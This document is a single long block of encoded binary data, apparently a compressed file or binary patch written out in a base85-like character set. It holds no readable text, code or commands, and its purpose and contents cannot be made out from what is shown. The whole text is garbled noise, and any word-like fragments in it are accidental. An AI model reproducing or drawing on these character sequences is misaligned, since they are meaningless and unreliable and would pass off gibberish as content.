z7~+T}o*3VUDZUuvj5Vg#;*CB2803&??O5cJO+FcAN=Z(c<(6H3na-7Ao|)#FZLU)0 zn|0oq=bkt8!w(^S9-8Q)jiwN2p^sjg>873T4rrjCo|@{at(GimKd#=I>#h~$66~aD+CT?@6}p8M{- z|6WPuz#pId^36XV{q)sepZ)gTe;@w%<)5Ga`t83T|NQmepa1^-{~v$>6yN{}SU>|F z5P=CC-(eI8zX~-Ff)SM91SwcS3tkX|8PwngIoLrDeh`Eq6yXT9CmRx$@HSAw-U?aR z!YrK-e7w<-3u#zG8;up>24GL?=EGir7)2 zi&A)@C|(hZS)9@oYs5q=Y7vZK6r*ams6yR*ag1qHV-(A1M#(gBjd7IY6WcgL%ghmv zd4ysekF-TS{t=KqjS^T(T>cW64AUhQ zds)R`9ut`fQ{OI2NK0cT6PnT7SNcqd!UOtJn%UGQx~R!aVy^O;+Z5+G#kI`tRdayY zB{_tPhbr*e8rTfA??{uf67Xi)tu!u&&bbz9u%RdLZv{_S-^cV zGNBQbsHNJ+p?Gf5pcB>TMkiHK(C8DR5asAdNg61RTGXK-WzYFa+ESNp=%gP7r)x4g z9hSZnr#a2hLdP@H_Q1$}Iu+_rSIX0#5|E}M-68)diP}`BGRdeY6<}{{WWT3g6|2RG zsZ;|$ZaH4wDt}aKZUd-QE+1geV1@tjUMQc^p>Q=knb)d`SN%EOju!J4h5*Z4h z;dItBs3q%XQ?peDrgn*^?dD%q+uEsCwn>IvZD_^k#wz+&Rk{_eFo#&$|HziLyfut+ zwOUr$07tjXnJs0Zde)_8sEfi4X>Ezq#ohupRoWdc!gOd{{~&j_oaJtJoy*MLv}U@r zZR~P=`cMaD*SquuuX>r=p7m-6HWMhied3*J~5Is5hOkt&Q6Jb>T}8fvkIJggH5s6YjVP=O!} z(Gt<1ct1e)P8Wy_6C(eiN@OT9bwE%7FktBqT@bRs6jWfxfEPiZ$&De+h+yc_$22Lz zvV90lMgxEOu{1*MIVYP`n-t;*8ps4s7=VNV3_vDZ(DN3=umC{_!VS`BpPs+xMM7sr z&otTd77|-y&2okgg)oF60^tVRR6qhDNO6DVi)fmJ!4Q3jz?%(W20%{;)O|Psja598 zFc`oB0FX5REP?0AEC30CNW^`@Ac6k^FycFfFo3KFAO|rpK-LY|wSg|N0}V{UFkwJ~ ztRt|9=*+IGCuzNG*4%E-%x+}2Z{8i?1WUM~ z3x+3ORa%n;NFWddptGHA{gOpbA`D&-M5P7IzC(9!3$}eY6%sv@MWdV37p4Lo5K(Gf zzoY~YKyqO)J%LT1c_;IUxT`~5hnk215oR#;vY&&82gF!1As@L*Qtk2}wpu2yj`gf- zEgD>ZJU+cHfX}<5h+zYu*kZUuvT07B3Ru7rquvP{b|8Q!za$KVkToN$ZJP(2oewXW z!v?fna3{^d3$iYNxCeYAb9?`@-sP5V6XAW>UB)%G#qI0f178_llGeU$Rb{wborC24etU_Dxhi z6(%u>m213@h*myqt-RhZd|?DnFZ!(kUUl{;J^0&sHL;C7bpR;aKw^OP`gO7Z3v>Vh zU}EjYj_yQ5*y!&i@W28rKoAP>?cxpq!fo725A)DTmhjG-^3AOz^kT4Dt}fhHsL$jt;Z zYx@kVLAHPtNMQ%5;1S?&@x-eFj9~(@&%0>v`!Mj_knbjj&?k7$_kgeQ^o$fHp$S9D z_;%0pU}6aMY!Zy2c9$fW6wCF`*1G`eQWu)FAKNu2$d=f z*pAlR&M^KB>EHtjy~F9~PwJ@7K!nW#8lVk$!VCVd00dC%0Duu3P%`EZ06-y3;11kO zF<=lc1O0CF80zqNCU!BAzva57;@x%Vj!)75)i=^un`;f(HN}J74{$?Gou;U zzzw{C64)RO)F9x_;0;`Y5-5Qb*Z>?|;S8i95}fcgx)0MrAQE`t3l1_9Dv}Et!6g7; z93tTnVuKCZzzw>H4SazLcJd2aU=x^O2fJ?|6A~ugz!%_A&xR5Y7;+PqfeW-i3wrPO zZonnL@eBVbk~3~H&>Eo;`~VPq;t#-a6J%m2AK@tHYzx>R5gHBUSa_%AOjA71iZm8k3cySpbo0RFcHB6)L_;czz{T`8g|eTJb(aBpbT7s z01!a}sIBb0KsgBj4m?2CIAGOcVgMVlCJ^BOh7La6k|uEN)MkM(XM!LN5+RN3AbC?J z;L;_&z$B~D9~%=UpwK9t5m#MxYc#0VYng5-86YVD9|p%q8Yv1i-EATmlbJ z??rvgB_sh6uFet~zz*zy@)mLIlGGTM^aL_M1e`QT3*r1)q6^C41Wv&1P;=-|AQOl* z3{KP&VuB1F;7o78K>>qCUGzp>q6!#b6HM$SO7ukab4fEmJWnAe5TObxArX$PO9cQX zj^IoyAturQ4;-`#P~ZVjz(S3I6(i6T8NfwPKmhcUUIgzJPjJhEu>)(X{4z-w2g>hg zkvy#IH$5DuUOe9i5SKmz}k zb<#Yb909E~IivYpR1MT%(hh(bqP1CN?gpYEGadmERNz~iHQ;i=6S!a!w15&SKoB$yCK#Yu`5+P)4Pfup z5N^O3v_K5>P}NRgXPs38vLG`|RvH=s4x04=HWO^`)EFqC1kyGTLZAyIKoI{bVLqIa zWB)7=;?pHCty~R3VdtYO8^IBzQRe>45WwIy&sJsCKoB$lCK{m`5LXS%zz`CE8;}cb zVNKRxA_VB}6HoUPUUmUpLIkL@8BF(dUjhMs*6CaV0A6ANwM_(ELIQ@acL9I{IKT|# zlM(qZCXQg}-jf3?VNYe^-vj{+*p+8P025$hUhDNn^y9Ujhy|Al3u`i)GDlKUD%Z* zJ#7$Q`Ysk}byZbW82K2@YVj9i^{93c@A8R|C{V15(q z|4in-b<(&|3_M`c{_I;LS6fwX3otDZ0%6iL*$^<<48HZwe1Z-bfCfYDUJD>BslX93 zc9jL8WrMT=PC1pq)eshTmNXA^gSlA=;5dzeSWns1RQZ9a;NSl~SrAm2m0dXkcCc!V zfzkp&W<^<*HNYDtp%E~R51V0Mp|M#vArhK75c(iyeR2YnvNZ%3obPo45BJtUE-k~;3Wcq4$kxbCcyi8j{`2)B|e~v_r z147XlHsGn%c<34+_~ui2d9Hz(czCD46G7ikI@{V6Gd08pUAR0D$_! zKmmwXb78KlFZhK8!6jUHxTiY;L8`b{i?r^bg zx}6tDZ$b=k+Y*Mi0W`rSUb_Jf;n)@E~ zE&)FuT-JWKUzCK*{Fso#?8-hIj(pVv33-qotdRd}@sFzvkylLdjPdh|kXPTRHuzcG zDxd(+8YZMs5aQE*L6;jZ!JrL60Hk3OT0oS~u@FtUUnAjrX;1(H@(B8%00?09dTr89 z;2I_Y4q~&Y2!Lz9GhusT znxVEJ58#vIvjw)X0LFm}=s=f4pbfSl4MI)k{`UwbtqKj(oQ;8;25JYV9Brnt|C3;i2hV5E6jU+28<983h`y zn!Mnt!2k~I+s7o~B`m=KhOPq=eG<4@0R&(Vq5&9oz!+L_L(71EHy#BN7yw=3z=@Xt z@E`z^t%KDrc^$FAXU)$4Kn>3Ou8qM9kN|YY*BCZ)$_@6Q_Y~8%Q;q{Z5E_%BSDDoN z_LLpeXfbzzzZV)?!paqwNI_s5cU>kVz;ELd;1_O&57(xB3zYU;xDRmA;u>pqowRu~>i?AYk}Uv(^hocI1W*wH%Fh2}?FKRd50;qL^gFGG zt#~y6iZ3`2D!~IF{z~ci2JnEkG1xC8+$E4;=x$&SQaIT@lV9{>!x!WI0~rND95u>o z#7(@!dr`y>Ilusdiok&bjTtR6HkSFgOG=*q?=aGFSmBLNN@uN^@jFP>4te z(;Rt#O^g^7eG05TxEZ~KI^O7nAs<4Hz($T#tT*UI_z7BE${5EVeBXV770=tYoU z7Y*bdd7&NjUU_B-IGg`shZ#aZXU4&#*Mg1Ep@1;}0FcQ+J6JFxBl1x(f`}smV2LFc z00tWylu&_-AGok#z=#OQp-7JaY$AsN#x#)0B^FrHKq$s+Amoq6z+nK208DX^B!rA; z$xI22U?l+v3E4m*3@y;xbc6_3;%5bfl@J~~%vfM>DV4;4a4sFhKp%amWQ+%3!F3Q2 zN!3Q0WC(>3oni|eg%U{!IY8HWXti;c1dc8g=9e!Kamf8MJ`~9B^;|jFt#%Os?5NSY?+G8^ENnh^*RxqhizxK$-Y1 zX$h+MS*h&1K9;nv#|BZ!DkBH)%yZ8^{|t1{LJv)J(L)!ckVX=D^pR*yFZeV>PA|QY zMhziNHPRDlz4g;^Va;`bUUw~Z)m9q~bw(JGt#(CUx4kynNn>_|b0vilh#3hi#%4lC z#N?$=Auu(NBNbTp(`*?QM;%I)5bnqVP)W7GV4_^L1syx=1O{YZi8-Bp5AqpPw+9s^ zl!t7zQ4RlfhL`~t7qHz{KxkB;S-^@VAvQX7jXf3_=~Fji=C<{4 zj6STU*8pXV^|U8KwV6*NgaW$!7$OnU=uad5CXz>06kXfmX^5WC4>+wUL=^I7ZeaL7AgdHd6>=!gafG0?MxDA z#FPJU^suNv^x=J9=@3HRzzKseFCku#&Z8F4H-wZRHEEQ9@bFU>hI9%5p9qhyi|eNJ$7O0&7VM<(zA()o97aWYC09ndy zpad+E)JXr@ zQIr}DZgCqaOJ538m7?t<4lslu_P_@}7~=qHD1ceKXUBu&1VB5LKmjHO>rDjSTE`J zNS&2~DmcIB@DDjeHJ<;HcOQZ5kw&*MLmz}g01dby5>$8uL9jBx_?6_0hWKfp`Y-@* z7!E3?;DQzwf}B9Kfgp4k&;Iz+sOc~OEIpw^3Dh8gqy*vwyoy95C{dsNUF~?@aOwcb zqY{Bc));g!0aRpX5XUkAa1yN0N=C2~Ckb~FgI&-EZFpRLY5Y+fIA&Br(;A*!JM1X*rA`#A=eAhh)-PITlD1apyB8ixsxFl8Gh~$Dg zJfbR3iz`&5kQ%wKW}#9cv9yG>0&0o(8G~3>D&h@(YK)E%${=&t(k>Ta3?Pt94&Q13 zC_Wjk3V=+=0Bt8i*pPt$IGB;Q@)oPssYhM%(imVCvx9-@BPg@eW{a#unH|ZmG9#hL z={3W=n2fS!HNcWl9P@~tAZL>_3juOIh$6!5V4J1$#PYNmo>f+93?Tmm!OP5NDT8U~ z4umVAq%O6oPmOAyQ8c4XbEwl;jnT86G@`3En?`S)QI4$IY9PgR+A8|%k_!8z!6s-- z%jVK!E8A@c704wdAe^N5$xm-Vj~`P7xLLvEsl`z$QwieR#=7o=hN-ITHiJ~Ggeoar zjn0acyar%xH=5GW zhz^K2z+r7_Qvo~#vd&d)8%shS0(gTr1t5X!wD8&U1tJk`H7$E06F(5U!5bfHL2S*i z6Ps=#5_HJzg9d_{5cGC7?9pFvDU=>cG^(?4c?4ev&|CtQgfahtkZ!lD`?l)}B)gN) z_wj}$9AkJ`yf!5-NyTtphTNCEJbG^?2%;|f8UrORYCs$GTcjiPmq|_vFaR)CLr;~N z(=f{7K^Sc4!ZQRlD<>y;=!kHHP(=-Dn0Fgxz9`-qgXH7fw2G(GVuqwPA^HnTbxrRG~nfA=qfbDlYNPJ=8mi+Gk2NSypgXP&_ra|pES_f%*@-?L85 zx}hLf#eGTtiqakP(xv0sF~^i8$dYHCW=f%kW~rut3&{U~4Old7V^R_YYZ1Xvv?gmQ zWf8+BQW8ah5y)y2C~FxJfxMChFY#|0!fJWZnRSBU8ej);yKn7W;g$C0? z2P6RrkZzMe3Pte<<5nUA@dzn~VUNID0ykpvV{n_bR|@wv0QYdqBXJI~1|?7vm1hQ? zP(D}@7n(sqe8d$8Q8|LpN<-mle02(KB?*Gi2N6&Wn-y~fH*;7)1zErbC6EDXKy7Yt zT}~5pLstRDP;?Q}EyEQCRJS0@6+sX&Tm@o6XE^^5iLzoIG;oBIU6}KA<5me+_y<}@ z2AD7kVN)d&g8~BZ0L}OSEARlWAR1zT1oY)&(%=(Rpepf_15H6DiJ&ec0tR`!V1p! zXL>|{_6J}+A^@ebUJNDx>|#Vr#sEdsXhLEM5da3Xu#IG9O9>bTYPKvs36PL5l#LWj z=GT1Tw|U7_er0A5omc^-VkM+x3|%mf%_#o>29r)HfC+!l1zqq5!^njtQ2~PHDhJUq z9FPHEfCqSxUivp^;Ad(3f@#k81k<5Q1+WPF)M+Tw0iJM{XQ`I!=YWmrn2!mWvsP;t z$TiHyP?xD|BB+5D#evAyYbn@*mbsa?R%->dg2g78EVyh4)dTBSfzC5PnXCwp@+29!NSND5!D31={F z^Fk1ORX`2rh6!nq*P&OblA8j-TX!f}d3ZJ_p%h6&hy@TZ29X_xaF9qK2$f(0h9pAz zMpE3VTE@@^8c+>N_mC%pIHYilq;UTb8BiXTP+E6I5J9INsR&#L5n0}_Pk~?zyz(_@ zVR#B5b=f&J{s}d`xIP0X8h%wm!m(silLg2qF&yw1j@4L?01T!P7)J6UF(N7bwM+ux zOYjtq05FdHWsc}LA_P!oRpL!d#!nxLFet(SFv&A9*rMWdCvNg?Ce)H3!EOe*C?ggf zqlOS)&;sk%kfEm#wRxMy06{!hk^LiDHYRv@#sP_-doe<$^fDrSpaLU80#>OIaBu*u z(g3Vr3<2;f2^gd>IRZkmDz>6ZFOmXxhBB2ZenPTjVNhUYR%Lq{22OTELuxA^NoIuk zeQ+t2b*3*Qxe#msM*Pxf8)5$fi+V6%B52mKGM3Py|AJ2YrcLOMF2kZf@}~I1%M4) zFog*r6oD{c1~E+`5T67QgC}5Hlt2k{Q2-*~LNE~sd+?&|WpQZ%7~Y8)C`yZD)f3H` zaIq*54L1q885)ko8?$u~$&djDZ~_fv5W&$0`=K?22t8%mQxkBE=pkN$00!P5JDSK* z$gvY+0Ty-;3HyW+@u~k423H7#Z~z*>9Wgcl52{;K`*qN<9@U^fSwx7O(Fher7x9@C zvFH&K6jX3PvTh(dY1IeDP_a|v9)7}YXd4=^F;|;HvI$WJ2e3E=@q>YPU!LGt&4337 zzySww2?x;t2@@}#U|UsSB@HkRDdYfkmk4-gq%4D^BccI}5-&`|j={tMEwcx{a6iW? zBph%9tib{Ew-7N1W2vE`&=GlVl%+Ird8-v-1u|lQG!m)eKH8SN4k=lw0*Z%J2xXN! zY}-LGh>r-Nk^g551Q=u#Hhs?IBnC05Wn>UXV5pQqxk9D}EYnE_5v0IUBBJz29I&Yb zxMYi@X$DcKo^tdLOlhEQT)0)Z5!ePBl^I{|5cFwjPC zUQ!5On*n>k1|UFrzln7CW`qQby|UvJU=ad#(1{YzQz9Tc5sPhL@c?WF$2}#e1hKQw zOVKDJdWiE4geMx5KUSz zu_v&8RZ#x{ej-&zy9E;)2nWE&J3x6d@uCMoSzvK1Q>$<0W3`;a2A7-~3A?pBARHl3 z32e{;4)C=zx5zO(NU3oMh?^N+SBN<4wh;oix2!4EkU|U!78!5?WO27p7p@di6Lmob z2QkTkP|25^$;1g!Xe$$cFbdqPxNF-8lNOi1|qj{RM1TplU@cfF>rYhjNk|! zFuTPN35Za44d4L*U=U%{DH}?Tdv}h<$C0HQb5-!aFTw$oAqH*PES4}Lt3ss-5rbf% z5??^FJsQdd(mwR25?vq^&D(D)F=E|o2+%XnebOE^g2Q|V-}fu z8M*&@=8FjbVhO155~aJRLmIp#Pyr+}Y7K1(hM)rYX9=K6Cf3qq{~Ivj$N^JOW||ZN z6~F=On?>IeP6|+uN9n+Poz{T;X|B4fUZP1IUTkr!|lYYshL}h#Rj#;1>oC=I2aFe8tk_!;Nd|21}WZ9 z13?Mf_aX>!sGor%M{)=*q}umH2Num|bPkT^wO@KCd*~P=>l-5gqY#9^XTYL8nB8C# zvyfv1=7HejI7e1zk-YMW#$!jzaM-?j^oGl|-)8k7oCkVPO@$mzcFvtCJ&ONGTTO-e zf@dATLM+??&UzwTg2eKhe*q)sEX@J%H611pFMFbBDU*PtTP=RGzU-pdL(6A3M0ob+ z>;J3RC&SpjXKArix@}OE2H^mFHZj1`Gb2Opw+kqwJ28@i?rr@t%>qeMIca(cD6g&B z&pt7Ll239L1}G`-n{*KQSpYd`+y{^F39s-A-ZDDePY5C{b@4&goJoX%~b@OFm}*vTk}B)D{yg1aRS#Md2~eu3Qj;31QsVx2{})-RWSb;Z^>{-Aab6O z0fBX*pV&qer}6$s0@4uTN*?w%kO>xN;wW(R5d{=sPo^#|h&refiSUUiAqWHjuvCyj zickSLo&lQxv(n(PEuaGP2F*T%vU8N8TOb$+&K5{c2Ni0e2*l)+&;k`eO*gOyK+scA zH|3;NH&%`i58#LTaSe0d<)iV%X&m_?kZzQZ1e?-cjy!fJFb;DMQ69?%shbcT5E^7K zea0Z5DO3WUI|c1k1`SpQDqs)|;09rE5SySxdN(rWetb-V2R^CjYw87VmNM4AVC*9A zf$)|Qh6D!?n`(}8J1n0eJG>Z&A(>F2p+Z&w5z5#=V_{VEAwmDp7@`Ax1Q{|EqLM-f z1w<$mUPX z4Y3`_faT@P)vaI0o?ZKP?%lnA2OnPic=F}VpGTkGI~D)-?cKkJPi0{I_w(uB$Dd!n zeD&QY#Ix_rt3BHa1!O*@22lQhU|2%9j zJN+Egkiq&?d$3gH?V-(vuYK-zeuMKaci(HJs3(hv|p zP{i>;{+I;t5lR}t3=atc$)rN-`~W7z6FXAJJpY|G!0esM-4GgfP0hjvxV>~h-`Qwic)q|8EKORNzNlGKl4w2>r%WTavEL5_* zK`p@mQ&Y8DQ@l0#IMur_3bSN@@YYnvLn8e$xF>{l~L z{R|)>&)mz!@9s4YIAE22{jXyqgEDSN&He<4vQ!PwfCofi0)y7GJUwoDLaSb~t_MDy zMb16kqk{J^STqH8aCY*Wp9e)aLK2qHgeOE{3RO5g?LCls*0Y`qS*Su9+KhuW#9j4iBE)L6s0&tD&7i-S7e|OC5Xi$R?&-J z1Y;P*I7Tv-v5H(oW3iIPxdo=NU}l749OXDiI@ZyScl?zb^_V>^9&wL>!ebx>IY>el z(vXK-;vW^+#PNg>Jc}F?A|*LVN>l&^$kEM+-MT9&YtdtBujZ&^!T_R^QX1ZFVxc1u0x@@KmgW-^tzOlCIInQ|j0 z8jYz-PCnC`*TiNvwHeB2rg56btmZbwIZkqx)0|W6rZoG=N?e}Po$rKaJmq=7baL^V z)GX#a^|?=e_S2s+t0xxk$xi=!{?nibMQB15in)LyaiI7V=t3nrQHoZSpCf8$5@DFD zf=aS!)|uOST)9Pymeiyt<)-8^Dnw7}s-u|t=n5HGuaSZ@q%f^1N_DzZo`x}}DEz4( zHEODvp74e=Wn*_@s>_}>)u~SfV^B>fRm*LTiASC4O>IimY-yFLPz7sP#mYmjjlB!E(npclGR=U>Jt|C0E2lLv-U~#lWa&=dR>V?##UM+~#Y2w8yD6u!e zwPNLx4PRv~Du$g!d=8)_|R z+SaPpv6{tgZgmT+!s`Ffv(0O)Bl%d{tdWb4Lu_Gi2gcgs=1i`~jbv=^C0e8vb+^~W zZg$t%!{6!;u+9aoZL14jj9P5G;VmzERf=BHjy8Jk4Psvz{GWG;6Zvqm294*@IP^Wq7=H&z>Mbp~ZN(|E#J z_Nta^jO7JCcgz1?#&e#b3T6|Fd8DgtE}T(pWqhU9%oT+2dmWr;DR1@A>J`>&WvgdO zSNf@ZW*(+<7iZeO_-c}6w2b5W(HQmE&7MZ8qYup3MP~-emWFk#ORDK3_g1F1cD0}b zds^A@7}u%JwQ{HY;wqb($vP(VsT1vCSvT9+^Q5)$qTM+=(-_tFt?z}WGRJw&XKr(zzg*`(-+9k%4s@Lho##Z)xzUG?beSu?=1gz8 z(_s#EmrLE}R1dn;v7U9OZ{6xwr~21pj&-qn{p)78I@+~P_Or7+?QUOt*xN4mx6?iD zP%k^&yRLVot9|cw|2y92F8I0={_afAJK+1yccc4#@rrLe}5ZDim!eNaX@)8k`RM<#6#@A2Y&E{ zKYZdB-}uKze)5&SeC9Xb`Ok-b^rb(2>Q~?T*T;VLwZDDtci;Qp2Y>j*KYsETzxOeS z!y5lgp^G@2!yM-@Ld3~I4%*k>{`Y@<98Rtt_QxOzT@a(lLae&E4l5%-kZP->NtOk) zwP{PZ2ZX><>Vn-%0*70I_iMd#m_PjEzz&SPj#~mHfD|Q&gCrn=2t>gYR6&y>g56Vs zd0@Twb3YmMz#6o{j5C6Hz!U&n!5;L%AM7U{T)i74!Xm^tBOnJLRKg`>LZ>pqCxk+C zXu>I^!YWj#D8#}Ww8Aaq!Y*{DECj<2^ujSD!!l&1FhoQ9Gs87x!#0GaG=xLhbHh2L z!#b3tIK;z^v%@{)!#<3oJOspx^TR8{Kpy)NuV?jhl>M$ zq{_2I%OJB#o-{^DG>3jvNuLx&MLZ7@G`Y0I%e?Hbay-X$Tt|Y~y}7iw^B_wla6r98 z%*2eRXdD6_{6}jfh%Z=0xg1FIuuEMyOvTj9&D2*RFRG$Mj}vxBuIjJ zkOy>tPIQomd0>$vJ5f*26YiW`sH95Id|0t)|Ff+es48{o={ zGs^Z{PYO7}?X=JP9HZ`>J?p4}_vA+6{0`&nDqnd9B8UR|>qe*~O@TCmC?JCU!_Nqn z&?VAOIkb)>h{4(f5A!@uUKxYbF9XI9QX-*2gVn_`YbQ-XV)hrHzxinPs|LbT9Hi8m z^^Q;KUoO%~$K!=bla|R80@W;5NP?10?@i$;)5jBUi6&hc{Cj^aelC9jr2RZjrSx2UXTKc>VVuG1J-*B9qf-4BAWZ?rE>By9*e)3go_A z1@hu>+ym1bd3e2pX@AHJ&9&*<8VI)k1N%UiNC3ABD8$h2+G-37($2klhDrnR!!^zE znAe_+huILl&aCNs;2uh`J19zNY=^DfkmUs^TDZ>|{+WaObLUa2<}G6b*W2*IsjJBO zyUVVHNc_qH%}GxHA~}Apa_QF*v(OItCX40?i-WWxGSY>8DN}ddLF`wAy;ECm^8b;4 z93?|uQj_DM>n;7U4XbNYq%MA$w46&Wjn=Q|74I~diaKm>T0GIxYzXlwJ3>|Vi z9hOLo9xBei|1RqJ0ND{sY$S;H9ne$}p3TK^#r54$mGs5TCrPL2DBG%IV)ZkdfDdNqbEz=tICM-qVC$3CfX=0&t2z zf6A|rbe(^#x@HZo{j6{{fPMW)n=eYYE+q(9I*wOCxVT?>x$(Fp(bRp#48rxBzUEf5 z#2_gQ_T!D3Qd!454!_5XiNuTd(OHB7^kbi;+TgD#P+E+A-N6y9{sWjqCEOt2u{eM( zceoj|Zs4&LhSPVj58Ye$ph<1|-^Z}J%mbC+LB*!A1DsiU3Nt)=fKzR9CaGs%K25nU zv6?;6oD5gbS;J_jX>PIyF1wz7UUX4$zWRjl3*vX0MQdWk&_SAds#Ur*plIJlQdGBHa8dE|ERoW8T#B(6y7r*0YvST>JV1zsX{&lJ- zVlRE!j;Jw^x9>_{`g4?G_IzjG{IL(NB4~; zvzpL+Q~I77x{II1!v}CGSb!=yUaA_LDdA=$ z!A!^lXp4Ug35@uJgDP^hd4>1p-A~hy|RD!q592{EdQPssVJfhX^m<+pm3Y*#j>&{5Wlh`FGcG z#X$DZjT>=5UTJT4B>owtpSxHL47DVB>Zri($Y`^L2Sh`Wv>XR>3curRk@KJKu4_-@ zx$AuA3^zvl;HH;k;J6{K5=mj7w>LI@m4!e9_IUUfUjE6dL3|*43sBt^$c^(Qpd5Km zVeSAToV?=F=l5(MShBpmd-+jo%`rUyc#1;`e= zA`W|_`v|o(9xpod0I@~;;GM{WJTJQNeJJT(>QEh#ZuRKp813(ULKnc9u8!Dl1%JfoSr6pRWO=P2vH!37cZfMbfbv{(wkP&k$n(hw*R9Edl@)y5=7e`Xdl9 z8xryZr-+Q#K%B<>fKnnt$Hjq>A5P8s>6Q<%s4=;=dqw&mTh4wm^`U(0l|S z?NT}=sTq8e3=d1Aek~R<0zEBh2GgBVNd5S!#zdJu8dwqudh#P)WFPq1GJfn%KtJ7< zxCz~}lRYZdSl&F`Exvf5ja%y7z!8_|Fv)u{D91PK@xxYkl2QY6c%jjiU-33BwW3f7 zDvjij&;3-{7mA4+n6Mm6?pECfIQJ_*>1mMRB!Ng~mJ?w32BIOu3@OR`& zRVsdKe+cQb8j`q{M*UaYM@A|2e4L$77q&@-gU0(W)kWotMY+4It+A!NV~ei8lv-)B zf--rfjt@{5yF}@S7VW)BW)IPZ8rXgBOp4hjXNyyOPBNL_QWMJXjxj5g_`h zSp5m7JrLNH%%Ku^wAEP-?Y7m~eLRJ+$R=|u-IWFof~n|jLCrr)&=XW}=%memxI>Rp z88(OBtJzlc&On3f?YHm!@oS0Cv(;O_UmKH}OfpFgm&*~jCq`o9l|JeOQKqonLbd>2 zJg>Gc=^Me*Nrua9j|pf!Q>9XAWDwNPF(H9OEOXQJ+~QM9F)lSqn-;m3baeBTQo;|j zOiIh%H6Cn^>Q+V36>ux7%Q4v2A!IV^ArN37iNb7L6OhBmMdQADzLMelR#2@3Vny!M!72W)Ne%JD3g5RSEbz&&fIA@UL2|+i5 zB|D3z+^Gj+db1n_x^`Rl+v2?s6_nh8<1{!jyW{f0Cm8!vI+G7trHGGQLUn6>t!P7ML%zb$SV85>ptdnKwQy4x{wxA zA^%wHiY+KHMJbjf9H)G0<3vHbB}NKiz6C7p=G~a#&s&s{qvEG>Ch}muCw!I3gAjcU zXt;A8Khxf{CBQW4IHrI(W>Gp_iMp&D?_@5iAJ5G{vN9?`Q~adEiLJ^U@E_}%wub@GDG3El(bR30Kk#4p$K}wx zX`C-GwEX|Vaj{*OtZm38NUj1q8gN@ZkeDd3-*KtlI8)QwIM)h$FU zj^`*3;TI=%tJKB6(j`!=B%t~q-9=o+9Hn?9ym(4n4dj!5Oa+txA+$nSTb|)zt_-sD zVoLD{5JX8eiCue=QRP|NIZHTC7lDt#m{%MIz~;*FPBwsX5MxfzhP?|N#0jYFh50V+g? z!}R4vFLgl~*^3cAmiFsfj9}bMwp3=pqLAp-c+{96o5dH_WtuqKI#WRoewRdT`c{Ah z9Vwv_O7DfAuxCtiXi?oj#In33F@G7P3wt>3h@Ai#WT>TOPcS*%csgg`nw1Wat^@sU zucCl@Bw8o#beblo0*SY(K_NI)m;iCZ!c2z6DGvE@arzl#stqV%&!&<2uC6)B;ad<@;IkG!;V z?})*%Bol^j0B!v|ej%fER6*XUA{^dW%^?R9*l#i)!EdJuz@n{yDBLZQN1PkQAoe>& z^M?dvZ9bE*Tp(Lh3-5`D*n!BOr8Az< zaOjr8vrBrg8YWcvnCILjLMG4SW#Z&<0I(7ul1X|}x6)HDR}E$WB$xJ6??0e~p+IEZ zbY^HWg+c=dM*2@&e^w_23vQKlMS}k&XSDZbzQ*cXsQek>6yPXFzcQBdj;0Y<0TS=Y zKS?J&Y@J|4 z(WPv5t?!0}yYevnAsUDrYfl5`1f`$FyDG|4xZ--Ko-qzw&(P@1H9+O^ZEKiGw+-3& zJrL@`;k`Q@;#9D&>fc)2^*nhwmu_H1g;AiqZsbpZ>sB_DPoaS>wcmKT&qSIbDJ>XT z;*z?x5?NRDk*;Q|&`}cZREYNW4Kv5cxsqo$7^0)N4)Xd<0Q^iQ^*Tuo%jtV1NQ*mf z5`Nqr&P~lNQBfVp5c*2_9Cj@DR|}g}Uc&=;>>>a>y;on_WKJ1(B;b3>sH0-y%5NqF z0l}Ks9)ySCsly_a8ou7Z_C`0UMIXWA~47&yBW$7+S8{=K~-+DQu#x z)I>A~vgE6TZ89Aza6xy$Hm_bl1Zz{PZy#(-rDn9LRlY7UeS%`oiPA803kL3#8nfr^ z89dWR9{mwyTA*1NK*uRASY6*!FZ`X~Rn-3CyjAf{a)Mli;z( z#mzCL5ggIN56Q5r*DjfChS!OKJwrdvgmxIXLy1DT@vkiei4s?lf8$&u3o&X=;aCjD zLZcr(9s{1^PbDJ;d9ih!bOYGnRc3(LgqFqBn#)4}%e?NaQjr`K&C4~#j_eHL@^O%} z4Cfaa0e9J8BWf3t zP{k==t}EA29W|U85GRB5X0S7lfBqY43>;biPQ)D~3)1_qL*JtA!Ft%>^zcA!I%b?I zFGQKw#z@Ka9&$}3d-y%JQ%ek8^A~vmcDi$N7YZIPBjPo#aw}haPSKa1FbT%|gACbjFsW z;}N4mDh7s5#P9?b&E#~nOQ9_FrVHa;SI$k{7IGO9^1QlBj?Bu%J*-pC=*dALW)mwv zh^xphQS2hZ#Wqb(0kmFAxwgHf6@qsXiS#Y*6JxQhKWTA^it%KO=QdEv;)n zDTP5YZn%7W>H)0OB_s=0kfla#zILj)(A^!qyoVrq*maUU z-ZU;7CSrE}zzzQKNA`W~E}Usj=tMYf=peE{2!NJ9m#L{e_q8tGy-rb;4Ky<@F##@&No7?jq0!?wa>RlL3+k-=KYtmvoL+DI&Qz^5IL<94pfslS(YT`;! zcSoqG0fI10>_PHlE=>pv-5zV2{ICQ&5Ow)j$XBkJDf`HI@naZSC)vgVMr0#?1Ya*4 z&a&CS0|w>DIyTT}C&|~Mgt35Y7O6AXS1g(r@vL~FkeJ)`vKcMR9BeLQOliH{6r4;4 z9*iGk*MMj`XyCSlcrQMd;Vl_>QiWT-CBGIBUdNU?^#C7Jm2q~P?JsMM7~sL18G5@7 zWM*|#ms3$N?0dX;^QV0Y#Xve5Q&ZD=%KwL9h2;d`xSB9^L`3W z7&RPEdFOw4-JM7=jX(f(7P`pBD}@&W@&)li{nD`lS2?1y*4eu=fae7R4-7bnAFX$+ zNs$B|8{c|DjW7fU*uzN%_mJIo7p^cRL*Eyzc3Tu?ln?p>)@l5uNvHvd_lzb%soP$K zLLoKU2m|W^DRkh`bbD)0GAE`J-xF_3P;=uagDMxCz#ELblm5&zTS6mF;5Pm&wDiY0 z7mO_n>?e>6uG88`049CJrr?A>JRJD?@hM??dq9CvqlI_Wi9vw;l$`2~V~)Svg;b7T zeEd=Ta`alluI~4U41;eO$w;sfQ}6os*u7R;=yB7Sme^({**m93twE# ziA5<@sjr!@L|s)wBvw<+w+1K}n`jEoCVd(tnCx_zl5b4OkqHSSV5Wo!g*wB#)u=oG)VNUifPLP7dDy=OseYin zh^vn6p(K7RPX#lU_+yZFnmgdoy4Qk{;K%=Q0Sd|CK~Q2r+~3x!aZVclhQ=iFXDQucurpo^m-mU^uY%_#_6rVdrR78 zT`rLT6cyqJAypK|+rtFIu#EJ#jZ0-1yrp>p9xATpf=L3106r4>v&XgSSi}Efd+5ma 